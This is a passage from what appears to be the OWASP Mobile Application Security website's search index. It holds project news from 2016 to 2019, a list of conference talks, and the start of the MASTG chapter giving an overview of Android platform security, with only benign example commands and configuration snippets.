"},{"location":"news/#january-3rd-2019-multilanguage-release-112-of-the-masvs","title":"January 3rd, 2019: Multilanguage Release 1.1.2 of the MASVS","text":"We released the 1.1.2 version of the OWASP MASVS! This is the first version in Chinese, English, French, German, Japanese, Russian, and Spanish! Exactly: we just added French, German, Japanese and Chinese! Obviously this would not be possible without all the volunteers that helped us with translations, feedback, updating, and automating the release process! We are grateful for the awesome team that pulled this off! Want to see the result? Take a look at our release page!
"},{"location":"news/#november-39th-2018-release-110-of-the-mstg","title":"November 29th, 2018: Release 1.1.0 of the MSTG","text":"We released the 1.1.0 version of the OWASP MSTG! Now all requirements of the MASVS have at least one covering testcase. We would like to thank all of our contributors for their hard work! Want to check it out? Check the releases!.
"},{"location":"news/#october-28th-2018-call-for-company-references","title":"October 28th, 2018: Call for Company references","text":"We are looking for company references that are using or have used the OWASP-MSTG and/or MASVS. If you have done so and are ok with being mentioned: please email to sven.schleier@owasp.org.
"},{"location":"news/#october-28th-2018-the-masvs-is-getting-more-translations","title":"October 28th, 2018: The MASVS is getting more translations","text":"Thanks to Romuald, Koki and many others, new translations of the MASVS are popping up. We now have a Japanese translation added and the French, German and Persian translations are in development. Each of them will be released the moment our release-automation of the MASVS is completed. Until then: feel free to checkout the sources!
"},{"location":"news/#october-18th-2018-the-mstg-is-now-officially-an-owasp-lab-project","title":"October 18th, 2018: The MSTG is now officially an OWASP Lab Project!","text":"During AppSec US 2018 in San Jose the Mobile Security Testing Guide was reviewed by several volunteers to assess the maturity of the project. As a result our request for project graduation to lab status was granted. The reviews can be found here.
Thanks to Harold Blankenship for organising the project review event during AppSec US and for pushing things forward for all the OWASP projects and of course to all people that took the effort to review our project!
"},{"location":"news/#october-13th-2018-mstg-102-released-twitter-account","title":"October 13th, 2018: MSTG 1.0.2 released & Twitter account!","text":"While working hard towards the 1.1.0 milestone of the MSTG, we released the 1.0.2 version. From now onward we have better PDF, Epub and Mobi files! We hope to port this to the MASVS after the Github release. We now have an official Twitter account: @OWASP_MAS!
"},{"location":"news/#september-21th-2018-masvs-automation-started","title":"September 21st, 2018: MASVS automation started","text":"Now that the document generation process for the MSTG has been optimized enough for milestone 1.1.0 (and we reached #1000 in Github of issues and Pull requests), we have started to improve the MASVS releasing mechanism. This will be further improved after Appsec USA and the release of 1.1.0 of the MSTG.
"},{"location":"news/#september-16th-2018-mstg-101-released","title":"September 16th, 2018: MSTG 1.0.1 released","text":"The Mobile Security Testing Guide version 1.0.1 has been released using our automated release system (based on tagging). See the Release Notes for all the changes. We now have added pdf support and improved our .docx quite a lot. We will further improve the release process for the pdf and epubs after milestone 1.1.0.
"},{"location":"news/#september-1st-2018-mobile-security-testing-guide-mentioned-in-nist-sp-163r1","title":"September 1st, 2018: Mobile Security Testing Guide mentioned in NIST SP-163r1","text":"The Mobile Security Testing Guide is now referenced in NIST SP 800-163 Revision 1.
"},{"location":"news/#augustus-2nd-2018-mobile-app-security-verification-standard-releases","title":"Augustus 2nd, 2018: Mobile App Security Verification Standard Releases","text":"A lot has happened & we are happy to announce that version 1.1 of the MASVS got released! Not just in English, but in Spanish and Russian as well. Want to know more? check the releases!. We would like to thank our Russian and Spanish speaking volunteers that have put quite some effort in translating the document! Lastly, we would like to announce that not all minor version releases will be in this news-section, unless something really important changed. Do you want to have the latest version of the MASVS? Just check Github!
"},{"location":"news/#june-16th-2018-jeroen-willemsen-joins-as-project-lead","title":"June 16th, 2018: Jeroen Willemsen joins as project lead","text":"Jeroen Willemsen has joined as a project leader for the OMTG project.
"},{"location":"news/#june-15th-2018-mobile-security-testing-guide-release-10","title":"June 15th, 2018: Mobile Security Testing Guide - Release 1.0","text":"The Mobile Security Testing Guide is now available for download in various formats. This is the first release of the MSTG and is a great community effort. We want to thank all contributors through this great journey. Thank you!
"},{"location":"news/#january-13th-2018-mobile-app-security-verification-standard-release-10","title":"January 13th, 2018: Mobile App Security Verification Standard Release 1.0","text":"Version 1.0 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements and is our first release.
"},{"location":"news/#september-14th-2017-mobile-app-security-verification-standard-update","title":"September 14th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.4 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements.
"},{"location":"news/#july-5th-2017-sponsorship-packages-announced","title":"July 5th, 2017: Sponsorship Packages Announced","text":"We are happy to announce that a limited amount of sponsorship packages will be made available shortly through our crowdfunding campaign. With these packages, we offer companies opportunities to create brand awareness and maximize visibility in the mobile security space. 100% of the funds raised go directly into the project budget and will be used to fund production of the final release.
"},{"location":"news/#june-17th-2017-the-owasp-mobile-security-testing-guide-summit-preview","title":"June 17th, 2017: The OWASP Mobile Security Testing Guide - Summit Preview","text":"The MSTG Summit Preview is an experimental proof-of-concept book created on the OWASP Summit 2017 in London. The goal was to improve the authoring process and book deployment pipeline, as well as to demonstrate the viability of the project. Note that the content is not final and will likely change significantly in subsequent releases.
"},{"location":"news/#mobile-security-testing-workshop-on-the-owasp-summit-2017","title":"Mobile Security Testing Workshop on the OWASP Summit 2017","text":"The OWASP MSTG team is organizing a 5-days mobile security track on the OWASP Summit 2017. The track consists of a series of book sprints, each of which focuses on producing content for a specific section in the OWASP MSTG, as well as proof-reading and editing the existing content. The goal is to make as much progress on the guide as is humanly possible. Depending on the number of participants, we\u2019ll split into sub-groups to work on different subsections or topic areas.
"},{"location":"news/#how-to-join","title":"How to Join","text":"Join up for the working session(s) you like by following the link(s) on the mobile security track page, then hitting the \"Edit this page here\" link at the bottom, and adding yourself to the \"participants\" field. Signing up is not mandatory, but helps us to better organize the sessions. Don\u2019t worry though if your session of choice happens on the \"wrong\" day - you can always simply stop by and we\u2019ll brief you on your topic of choice. After all, this is the Woodstock of appsec!
Mobile security track main page:
http://owaspsummit.org/Working-Sessions/Mobile-Security/
Mobile security track schedule:
http://owaspsummit.org/schedule/tracks/Mobile-Security.html/
"},{"location":"news/#april-5th-2017-mobile-app-security-verification-standard-update","title":"April 5th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.3 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements:
* Merged requirements 7.8 and 7.9 into one for simplification\n* Removed Anti-RE controls 8.1 and 8.2\n* Updated MSTG links to current master\n* Section \"Environmental Interaction\" renamed to \"Platform Interaction\"\n* Removed To-dos\n* Fixed some wording & spelling issues\n
"},{"location":"news/#january-31st-2017-mobile-app-security-verification-standard-v092-available-for-download","title":"January 31st, 2017: Mobile App Security Verification Standard v0.9.2 Available For Download","text":"The Mobile App Security Verification Standard (MASVS) has undergone a major revision, including a re-design of the security model and verification levels. We also revised many security requirements to address the multitude of issues raised on GitHub. The result is MASVS v0.9.2, which is now available for download in PDF format.
As the MASVS is nearing maturity, we have decided to freeze the requirements until the Mobile Testing Guide and checklists \"catch up\" (due to the one-to-one mapping between requirements in the MASVS and MSTG, changes to the requirements make it necessary to update the other documents as well, causing repeated effort). Unless major issues pop up, the current list will therefore remain in place until MASVS/MSTG v1.0, and further changes will be reserved for v1.1 or later releases.
The MASVS is a community effort to establish security requirements for designing, developing and testing secure mobile apps on iOS and Android. Join the OWASP Mobile Security Project Slack Channel to meet the project members! You can sign up for an account here.
"},{"location":"news/#january-28th-2017-mobile-crackmes-and-reversing-tutorials","title":"January 28th, 2017: Mobile Crackmes and Reversing Tutorials","text":"A key goal of the OWASP Mobile Testing Project is to build the ultimate learning resource and reference guide for mobile app reversers. As hands-on hacking is by far the best way to learn, we'd like to link most of the content to practical examples.
Starting now, we'll be adding crackmes for Android and iOS to the GitHub repo that will then be used as examples throughout the guide. The goal is to collect enough resources for demonstrating the most important tools and techniques in our guide, plus additional crackmes for practicing. For starters there are three challenges:
One of these three already has a documented solution in the guide. Tutorials for solving the other two still need to be added.
"},{"location":"news/#we-need-more-authors-and-contributors","title":"We Need More Authors and Contributors!","text":"Maybe you have noticed that the reverse engineering sections in the Mobile Testing Guide are incomplete. The reason: We're still in the starting stages and don't have a lot of authors and contributors (in fact, 99% of the reversing content was produced by one guy). We'd love to welcome you as a contributor of crackmes, tutorials, writeups, or simply new ideas for this project.
"},{"location":"news/#what-you-can-do","title":"What You Can Do","text":"The OWASP MSTG is an open project and there's a lot of flexibility - it mostly depends on your skill set and willingness to commit your time. That said, some areas that need help are:
Help us figure out resiliency testing processes and obfuscation metrics The reversing part of the guide consists of the following chapters:
Tampering and Reverse Engineering - General Overview
Read the Contribution Guide first, and join the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members.
"},{"location":"news/#january-22nd-2017-mobile-testing-guide-toc-available","title":"January 22nd, 2017: Mobile Testing Guide TOC Available","text":"As of now, we'll be auto-generating a table of contents out of the current MSTG master branch. This reflects the current state of the guide, and should make it easier to coordinate work between authors. A short-term goal is to finalize the structure of the guide so we get a clearer picture of what will be included in the final document. Lead authors are encouraged to complete the outline of their respective chapters.
On another note, we still need additional authors to help with all sections of the guide, including mobile operating system overviews, testing processes and techniques, and reverse engineering. Especially iOS authors are in short supply! As usual, ping us on the Slack Channel if you want to contribute.
"},{"location":"news/#december-4th-2016-call-for-authors-the-ultimate-open-source-mobile-app-reverse-engineering-guide","title":"December 4th, 2016: Call For Authors: The Ultimate Open-Source Mobile App Reverse Engineering Guide","text":"Reverse engineering is an art, and describing every available facet of it would fill a whole library. The sheer range of techniques and possible specializations is mind-blowing: One can spend years working on a very specific, isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. For mobile app security testers, it can be challenging to filter through the vast amount of information and build a working methodology. Things become even more problematic when one is tasked to assess apps that are heavily obfuscated and have anti-tampering measures built in.
One of the main goals in the MSTG is to build the ultimate resource for mobile reverse engineers. This includes not only basic static and dynamic analysis, but also advanced de-obfuscation, scripting and automation. Obviously, writing all this content is a lot of work, both in terms of general content and OS-specific how-tos. We're therefore looking for talented authors that want to join the project early on. Topics include the following:
All of this is unpaid, volunteer work. However, depending on your contribution, you will be named in the \"lead authors\" or \"contributors\" list, and you'll be able to point to the fact that you co-authored the guide. You'll also be contributing to the field, helping others who are just starting out, and in turn becoming a happier person yourself (reaping the full benefits of your altruism).
"},{"location":"news/#where-do-i-sign-up","title":"Where do I sign up?","text":"First of all, have a look at the existing RE chapters outline. You'll probably immediately have ideas on how you can contribute. If that's the case, read the Contribution Guide first.
Then contact Bernhard Mueller - ideally directly on the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members. You can sign up for an account here.
"},{"location":"talks/","title":"\ud83c\udf99 Talks","text":"Date Event Title Video Slides October 2023 OWASP AppSec US 2023 Refactoring Mobile App Security Soon Slides October 2023 OWASP AppSec US 2023 OWASP MAS Project Showcase Video Slides February 2023 Tech Talks by NowSecure OWASP MASVS v2 Updates Video Slides February 2023 OWASP AppSec EU 2023 Mobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides November 2022 OWASP AppSec US 2022 Mobile Wanderlust\u201d! Our journey to Version 2.0! Soon Slides October 2022 NSConnect Inside the OWASP MASVS Refactor v2.0 Video Slides October 2022 Cybersec Chile Securing Mobile Apps with the OWASP MASVS and MASTG: Secure Storage and IPC N/A Slides September 2022 OWASP Global AppSec APAC Securing Mobile Apps with the OWASP MASVS and MASTG. Our journey to Version 2.0! Soon Slides July 2022 droidCon Berlin Securing Mobile Apps with the OWASP MASVS & MSTG Video Slides June 2022 OWASP Tunisia Securing Mobile Apps with the MASVS. Our Journey to v2.0 Video Slides June 2022 OWASP AppSec EU \u201cMobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides February 2022 OWASP Toronto Insider's Guide to Mobile AppSec with OWASP MASVS Video N/A November 2021 NSConnect MASVS & MSTG Refactoring Video Slides September 2021 OWASP 20th Anniversary MASVS & MSTG Refactoring Video Slides September 2020 Ekoparty Security Conference (Spanish) OWASP Mobile Project and how to use it for white hat hacking Video Slides May 2020 OWASP Dutch Virtual chapter meetup MSTG Update Video N/A February 2020 OWASP New Zealand Day Building Secure Mobile Apps (you don\u2019t have to learn it the hard way!) N/A N/A January 2020 iOS Conf Singapore Building Secure iOS Apps (you don\u2019t have to learn it the hard way!) 
Video Slides October 2019 OWASP AppSec Day Melbourne Fixing Mobile AppSec Video N/A September 2019 OWASP Global AppSec Amsterdam Fast Forwarding mobile security with the OWASP Mobile Security Testing Guide N/A N/A September 2019 r2con in Barcelona radare2 and Frida in the OWASP Mobile Security Testing Guide Video Slides Summer 2019 Open Security summit 2019 Open Security summit 2019 N/A Slides April 2019 OWASP Kyiv OWASP MSTG in real life N/A N/A March 2019 AppDevcon (Amsterdam) Securing your mobile app with the OWASP Mobile Security Testing Guide N/A N/A November 2018 OWASP BeNeLux days 2018 Fast forwarding mobile security with the MSTG N/A Slides November 2018 OWASP Germany Day 2018 Introduction to Mobile Security Testing: Approaches and Examples using OWASP MSTG (in German) Video Slides October 2018 DBS AppSecCon (Singapore) Fixing Mobile AppSec N/A N/A October 2018 OWASP Bay Area Chapter Mobile Testing Workshop N/A N/A October 2018 OWASP AppSec USA Fixing Mobile AppSec N/A N/A October 2018 CSC 2018 A Perspective on Mobile Security in IoT and how OWASP can Help N/A Slides January 2018 OWASP North Sweden Umea Mobile Security Essentials N/A N/A January 2018 OWASP Gothenburg Mobile Security Essentials: All about the keying material Video N/A January 2018 OWASP Gotentburg Mobile Security Essentials: Introduction into OMTG Video N/A 2017 OWASP Day Indonesia 2017 Fixing Mobile AppSec N/A N/A 2017 OWASP Poland Day 2017 Testing Mobile Applications N/A Slides 2017 OWASP AppSec EU 2017 Fixing Mobile AppSec Video Slides"},{"location":"MASTG/","title":"OWASP MASTG","text":"GitHub Repo
Previously known as OWASP MSTG (Mobile Security Testing Guide)
The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the controls listed in the OWASP MASVS.
Download the MASTG
Start exploring the MASTG:
Tests Techniques Tools Apps
Support the project by purchasing the OWASP MASTG on leanpub.com. All funds raised through sales of this book go directly into the project budget and will be used for technical editing and designing the book and to fund production of future releases.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/","title":"Android Platform Overview","text":"This chapter introduces the Android platform from an architecture point of view. The following five key areas are discussed:
Visit the official Android developer documentation website for more details about the Android platform.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-architecture","title":"Android Architecture","text":"Android is a Linux-based open source platform developed by the Open Handset Alliance (a consortium lead by Google), which serves as a mobile operating system (OS). Today the platform is the foundation for a wide variety of modern technology, such as mobile phones, tablets, wearable tech, TVs, and other smart devices. Typical Android builds ship with a range of pre-installed (\"stock\") apps and support installation of third-party apps through the Google Play store and other marketplaces.
Android's software stack is composed of several different layers. Each layer defines interfaces and offers specific services.
Kernel: At the lowest level, Android is based on a variation of the Linux Kernel containing some significant additions, including Low Memory Killer, wake locks, the Binder IPC driver, etc. For the purpose of the MASTG, we'll focus on the user-mode part of the OS, where Android significantly differs from a typical Linux distribution. The two most important components for us are the managed runtime used by applications (ART/Dalvik) and Bionic, Android\u2019s version of glibc, the GNU C library.
HAL: On top of the kernel, the Hardware Abstraction Layer (HAL) defines a standard interface for interacting with built-in hardware components. Several HAL implementations are packaged into shared library modules that the Android system calls when required. This is the basis for allowing applications to interact with the device's hardware. For example, it allows a stock phone application to use a device's microphone and speaker.
Runtime Environment: Android apps are written in Java and Kotlin and then compiled to Dalvik bytecode which can be then executed using a runtime that interprets the bytecode instructions and executes them on the target device. For Android, this is the Android Runtime (ART). This is similar to the JVM (Java Virtual Machine) for Java applications, or the Mono Runtime for .NET applications.
Dalvik bytecode is an optimized version of Java bytecode. It is created by first compiling the Java or Kotlin code to Java bytecode, using the javac and kotlinc compilers respectively, producing .class files. Finally, the Java bytecode is converted to Dalvik bytecode using the d8 tool. Dalvik bytecode is packed within APK and AAB files in the form of .dex files and is used by a managed runtime on Android to execute it on the device.
Before Android 5.0 (API level 21), Android executed bytecode on the Dalvik Virtual Machine (DVM), where it was translated into machine code at execution time, a process known as just-in-time (JIT) compilation. This enables the runtime to benefit from the speed of compiled code while maintaining the flexibility of code interpretation.
Since Android 5.0 (API level 21), Android executes bytecode on the Android Runtime (ART) which is the successor of the DVM. ART provides improved performance as well as context information in app native crash reports, by including both Java and native stack information. It uses the same Dalvik bytecode input to maintain backward compatibility. However, ART executes the Dalvik bytecode differently, using a hybrid combination of ahead-of-time (AOT), just-in-time (JIT) and profile-guided compilation.
Source: https://lief-project.github.io/doc/latest/tutorials/10_android_formats.html
Sandboxing: Android apps don't have direct access to hardware resources, and each app runs in its own virtual machine or sandbox. This enables the OS to have precise control over resources and memory access on the device. For instance, a crashing app doesn't affect other apps running on the same device. Android controls the maximum number of system resources allocated to apps, preventing any one app from monopolizing too many resources. At the same time, this sandbox design can be considered as one of the many principles in Android's global defense-in-depth strategy. A malicious third-party application, with low privileges, shouldn't be able to escape its own runtime and read the memory of a victim application on the same device. In the following section we take a closer look at the different defense layers in the Android operating system. Learn more in the section \"Software Isolation\".
You can find more detailed information in the Google Source article \"Android Runtime (ART)\", the book \"Android Internals\" by Jonathan Levin and the blog post \"Android 101\" by @_qaz_qaz.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-security-defense-in-depth-approach","title":"Android Security: Defense-in-Depth Approach","text":"The Android architecture implements different security layers that, together, enable a defense-in-depth approach. This means that the confidentiality, integrity or availability of sensitive user-data or applications doesn't hinge on one single security measure. This section brings an overview of the different layers of defense that the Android system provides. The security strategy can be roughly categorized into four distinct domains, each focusing on protecting against certain attack models.
Android supports device encryption from Android 2.3.4 (API level 10) and it has undergone some big changes since then. Google imposed that all devices running Android 6.0 (API level 23) or higher had to support storage encryption, although some low-end devices were exempt because it would significantly impact their performance.
Full-Disk Encryption (FDE): Android 5.0 (API level 21) and above support full-disk encryption. This encryption uses a single key protected by the user's device password to encrypt and decrypt the user data partition. This kind of encryption is now considered deprecated and file-based encryption should be used whenever possible. Full-disk encryption has drawbacks, such as not being able to receive calls or not having operative alarms after a reboot if the user does not enter the password to unlock.
File-Based Encryption (FBE): Android 7.0 (API level 24) supports file-based encryption. File-based encryption allows different files to be encrypted with different keys so they can be deciphered independently. Devices that support this type of encryption support Direct Boot as well. Direct Boot enables the device to have access to features such as alarms or accessibility services even if the user didn't unlock the device.
Note: you might hear of Adiantum, which is an encryption method designed for devices running Android 9 (API level 28) and higher whose CPUs lack AES instructions. Adiantum is only relevant for ROM developers or device vendors, Android does not provide an API for developers to use Adiantum from applications. As recommended by Google, Adiantum should not be used when shipping ARM-based devices with ARMv8 Cryptography Extensions or x86-based devices with AES-NI. AES is faster on those platforms.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#trusted-execution-environment-tee","title":"Trusted Execution Environment (TEE)","text":"In order for the Android system to perform encryption it needs a way to securely generate, import and store cryptographic keys. We are essentially shifting the problem of keeping sensitive data secure towards keeping a cryptographic key secure. If the attacker can dump or guess the cryptographic key, the sensitive encrypted data can be retrieved.
Android offers a trusted execution environment in dedicated hardware to solve the problem of securely generating and protecting cryptographic keys. This means that a dedicated hardware component in the Android system is responsible for handling cryptographic key material. Three main modules are responsible for this:
Hardware-backed KeyStore: This module offers cryptographic services to the Android OS and third-party apps. It enables apps to perform cryptographically sensitive operations in a TEE without exposing the cryptographic key material.
StrongBox: In Android 9 (Pie), StrongBox was introduced, another approach to implement a hardware-backed KeyStore. Prior to Android 9 Pie, a hardware-backed KeyStore would be any TEE implementation that lies outside of the Android OS kernel. StrongBox is an actual complete separate hardware chip that is added to the device on which the KeyStore is implemented and is clearly defined in the Android documentation. You can check programmatically whether a key resides in StrongBox and if it does, you can be sure that it is protected by a hardware security module that has its own CPU, secure storage, and True Random Number Generator (TRNG). All the sensitive cryptographic operations happen on this chip, in the secure boundaries of StrongBox.
GateKeeper: The GateKeeper module enables device pattern and password authentication. The security sensitive operations during the authentication process happen inside the TEE that is available on the device. GateKeeper consists of three main components, (1) gatekeeperd
which is the service that exposes GateKeeper, (2) GateKeeper HAL, which is the hardware interface and (3) the TEE implementation which is the actual software that implements the GateKeeper functionality in the TEE.
We need to have a way to ensure that code that is being executed on Android devices comes from a trusted source and that its integrity is not compromised. In order to achieve this, Android introduced the concept of verified boot. The goal of verified boot is to establish a trust relationship between the hardware and the actual code that executes on this hardware. During the verified boot sequence, a full chain of trust is established starting from the hardware-protected Root-of-Trust (RoT) up until the final system that is running, passing through and verifying all the required boot phases. When the Android system is finally booted you can rest assured that the system is not tampered with. You have cryptographic proof that the code which is running is the one that is intended by the OEM and not one that has been maliciously or accidentally altered.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#software-isolation","title":"Software Isolation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-users-and-groups","title":"Android Users and Groups","text":"Even though the Android operating system is based on Linux, it doesn't implement user accounts in the same way other Unix-like systems do. In Android, the multi-user support of the Linux kernel is used to sandbox apps: with a few exceptions, each app runs as though under a separate Linux user, effectively isolated from other apps and the rest of the operating system.
The file system/core/include/private/android_filesystem_config.h includes a list of the predefined users and groups system processes are assigned to. UIDs (userIDs) for other applications are added as the latter are installed. For more details, check out the blog post \"An Overview Of Application Sandbox\" by Bin Chen on Android sandboxing.
For example, Android 9.0 (API level 28) defines the following system users:
#define AID_ROOT 0 /* traditional unix root user */\n #...\n #define AID_SYSTEM 1000 /* system server */\n #...\n #define AID_SHELL 2000 /* adb and debug shell user */\n #...\n #define AID_APP_START 10000 /* first app user */\n ...\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#selinux","title":"SELinux","text":"Security-Enhanced Linux (SELinux) uses a Mandatory Access Control (MAC) system to further lock down which processes should have access to which resources. Each resource is given a label in the form of user:role:type:mls_level
which defines which users are able to execute which types of actions on it. For example, one process may only be able to read a file, while another process may be able to edit or delete the file. This way, by working on a least-privilege principle, vulnerable processes are more difficult to exploit via privilege escalation or lateral movement.
Further information is available on the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#permissions","title":"Permissions","text":"Android implements an extensive permissions system that is used as an access control mechanism. It ensures controlled access to sensitive user data and device resources. Android categorizes permissions into different types offering various protection levels.
Prior to Android 6.0 (API level 23), all permissions an app requested were granted at installation (Install-time permissions). From API level 23 onwards, the user must approve some permissions requests during runtime (Runtime permissions).
Further information is available in the Android documentation including several considerations and best practices.
To learn how to test app permissions refer to the Testing App Permissions section in the \"Android Platform APIs\" chapter.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#network-security","title":"Network security","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#tls-by-default","title":"TLS by Default","text":"By default, since Android 9 (API level 28), all network activity is treated as being executed in a hostile environment. This means that the Android system will only allow apps to communicate over a network channel that is established using the Transport Layer Security (TLS) protocol. This protocol effectively encrypts all network traffic and creates a secure channel to a server. It may be the case that you would want to use clear traffic connections for legacy reasons. This can be achieved by adapting the res/xml/network_security_config.xml
file in the application.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#dns-over-tls","title":"DNS over TLS","text":"System-wide DNS over TLS support has been introduced since Android 9 (API level 28). It allows you to perform queries to DNS servers using the TLS protocol. A secure channel is established with the DNS server through which the DNS query is sent. This assures that no sensitive data is exposed during a DNS lookup.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#anti-exploitation","title":"Anti-exploitation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#aslr-kaslr-pie-and-dep","title":"ASLR, KASLR, PIE and DEP","text":"Address Space Layout Randomization (ASLR), which has been part of Android since Android 4.1 (API level 15), is a standard protection against buffer-overflow attacks, which makes sure that both the application and the OS are loaded to random memory addresses making it difficult to get the correct address for a specific memory region or library. In Android 8.0 (API level 26), this protection was also implemented for the kernel (KASLR). ASLR protection is only possible if the application can be loaded at a random place in memory, which is indicated by the Position Independent Executable (PIE) flag of the application. Since Android 5.0 (API level 21), support for non-PIE enabled native libraries was dropped. Finally, Data Execution Prevention (DEP) prevents code execution on the stack and heap, which is also used to combat buffer-overflow exploits.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#seccomp-filter","title":"SECCOMP Filter","text":"Android applications can contain native code written in C or C++. These compiled binaries can communicate both with the Android Runtime through Java Native Interface (JNI) bindings, and with the OS through system calls. Some system calls are either not implemented, or are not supposed to be called by normal applications. As these system calls communicate directly with the kernel, they are a prime target for exploit developers. With Android 8 (API level 26), Android has introduced the support for Secure Computing (SECCOMP) filters for all Zygote based processes (i.e. user applications). These filters restrict the available syscalls to those exposed through bionic.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-application-structure","title":"Android Application Structure","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#communication-with-the-operating-system","title":"Communication with the Operating System","text":"Android apps interact with system services via the Android Framework, an abstraction layer that offers high-level Java APIs. The majority of these services are invoked via normal Java method calls and are translated to IPC calls to system services that are running in the background. Examples of system services include:
The framework also offers common security functions, such as cryptography.
The API specifications change with every new Android release. Critical bug fixes and security patches are usually applied to earlier versions as well.
Noteworthy API versions:
Android development releases follow a unique structure. They are organized into families and given alphabetical codenames inspired by tasty treats. You can find them all here.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#the-app-sandbox","title":"The App Sandbox","text":"Apps are executed in the Android Application Sandbox, which separates the app data and code execution from other apps on the device. As mentioned before, this separation adds a first layer of defense.
Installation of a new app creates a new directory named after the app package, which results in the following path: /data/data/[package-name]
. This directory holds the app's data. Linux directory permissions are set such that the directory can be read from and written to only with the app's unique UID.
We can confirm this by looking at the file system permissions in the /data/data
folder. For example, we can see that Google Chrome and Calendar are assigned one directory each and run under different user accounts:
drwx------ 4 u0_a97 u0_a97 4096 2017-01-18 14:27 com.android.calendar\ndrwx------ 6 u0_a120 u0_a120 4096 2017-01-19 12:54 com.android.chrome\n
Developers who want their apps to share a common sandbox can sidestep sandboxing. When two apps are signed with the same certificate and explicitly share the same user ID (having the sharedUserId in their AndroidManifest.xml files), each can access the other's data directory. See the following example to achieve this in the NFC app:
<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"com.android.nfc\"\n android:sharedUserId=\"android.uid.nfc\">\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#linux-user-management","title":"Linux User Management","text":"Android leverages Linux user management to isolate apps. This approach is different from user management usage in traditional Linux environments, where multiple apps are often run by the same user. Android creates a unique UID for each Android app and runs the app in a separate process. Consequently, each app can access its own resources only. This protection is enforced by the Linux kernel.
Generally, apps are assigned UIDs in the range of 10000 and 99999. Android apps receive a user name based on their UID. For example, the app with UID 10188 receives the user name u0_a188
. If the permissions an app requested are granted, the corresponding group ID is added to the app's process. For example, the user ID of the app below is 10188. It belongs to the group ID 3003 (inet). That group is related to android.permission.INTERNET permission. The output of the id
command is shown below.
$ id\nuid=10188(u0_a188) gid=10188(u0_a188) groups=10188(u0_a188),3003(inet),\n9997(everybody),50188(all_a188) context=u:r:untrusted_app:s0:c512,c768\n
The relationship between group IDs and permissions is defined in the following file:
frameworks/base/data/etc/platform.xml
<permission name=\"android.permission.INTERNET\" >\n <group gid=\"inet\" />\n</permission>\n\n<permission name=\"android.permission.READ_LOGS\" >\n <group gid=\"log\" />\n</permission>\n\n<permission name=\"android.permission.WRITE_MEDIA_STORAGE\" >\n <group gid=\"media_rw\" />\n <group gid=\"sdcard_rw\" />\n</permission>\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zygote","title":"Zygote","text":"The process Zygote
starts up during Android initialization. Zygote is a system service for launching apps. The Zygote process is a \"base\" process that contains all the core libraries the app needs. Upon launch, Zygote opens the socket /dev/socket/zygote
and listens for connections from local clients. When it receives a connection, it forks a new process, which then loads and executes the app-specific code.
In Android, the lifetime of an app process is controlled by the operating system. A new Linux process is created when an app component is started and the same app doesn\u2019t yet have any other components running. Android may kill this process when the latter is no longer necessary or when reclaiming memory is necessary to run more important apps. The decision to kill a process is primarily related to the state of the user's interaction with the process. In general, processes can be in one of four states.
A visible process is a process that the user is aware of, so killing it would have a noticeable negative impact on user experience. One example is running an activity that's visible to the user on-screen but not in the foreground.
A service process is a process hosting a service that has been started with the startService
method. Though these processes aren't directly visible to the user, they are generally things that the user cares about (such as background network data upload or download), so the system will always keep such processes running unless there's insufficient memory to retain all foreground and visible processes.
onCreate
handler is called when the app process is first created. Other callback methods include onLowMemory
, onTrimMemory
and onConfigurationChanged
.Android applications can be shipped in two forms: the Android Package Kit (APK) file or an Android App Bundle (.aab). Android App Bundles provide all the resources necessary for an app, but defer the generation of the APK and its signing to Google Play. App Bundles are signed binaries which contain the code of the app in several modules. The base module contains the core of the application. The base module can be extended with various modules which contain new enrichments/functionalities for the app as further explained on the developer documentation for app bundle. If you have an Android App Bundle, you can best use the bundletool command line tool from Google to build unsigned APKs in order to use the existing tooling on the APK. You can create an APK from an AAB file by running the following command:
bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n
If you want to create signed APKs ready for deployment to a test device, use:
$ bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n--ks=/MyApp/keystore.jks\n--ks-pass=file:/MyApp/keystore.pwd\n--ks-key-alias=MyKeyAlias\n--key-pass=file:/MyApp/key.pwd\n
We recommend that you test both the APK with and without the additional modules, so that it becomes clear whether the additional modules introduce and/or fix security issues for the base module.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-manifest","title":"Android Manifest","text":"Every app has an Android Manifest file, which embeds content in binary XML format. The standard name of this file is AndroidManifest.xml. It is located in the root directory of the app\u2019s Android Package Kit (APK) file.
